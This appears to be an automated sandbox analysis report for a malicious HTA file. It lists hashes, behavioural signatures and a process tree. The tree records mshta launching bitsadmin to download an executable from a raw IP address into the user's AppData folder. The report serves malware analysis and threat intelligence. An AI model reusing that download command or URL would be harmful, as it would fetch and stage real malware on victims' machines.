Analysis
-
max time kernel
46s -
max time network
78s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
11-02-2023 01:18
Static task
static1
Behavioral task
behavioral1
Sample
Agenzia_E2.hta
Resource
win7-20220901-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Agenzia_E2.hta
Resource
win10v2004-20220901-en
windows10-2004-x64
4 signatures
150 seconds
General
-
Target
Agenzia_E2.hta
-
Size
7KB
-
MD5
3626ac1650be6760e78b74a020497af1
-
SHA1
81d935580f02ea3cb9f183cdf119a71f2ca8029c
-
SHA256
2a4524ca5890d27b697850d6dfdd9fc90bce87b471f95855ced8a7308fb8e5cb
-
SHA512
17ccd96971317f0db68d9b9264d4a74774fde0a892ed89f78a956b518ab940802aebe2d53da5b76bf93525ef37e4b4b76718c4f729620c592e3187f67e5cbff7
-
SSDEEP
96:SPL+gIPNEbJPl0EJjAr3BZE5S4dwatCu2WJ3f2Wgw9RKUzVj5q4NaM+12AVoolF1:ST3FF6r/TC0u2W37V5q0aM0wqr
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 268 bitsadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1252 wrote to memory of 268 1252 mshta.exe 27 PID 1252 wrote to memory of 268 1252 mshta.exe 27 PID 1252 wrote to memory of 268 1252 mshta.exe 27 PID 1252 wrote to memory of 268 1252 mshta.exe 27
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Agenzia_E2.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://62.173.149.243/scarica.exe C:\Users\Admin\AppData\Roaming\setup.exe2⤵
- Download via BitsAdmin
PID:268
-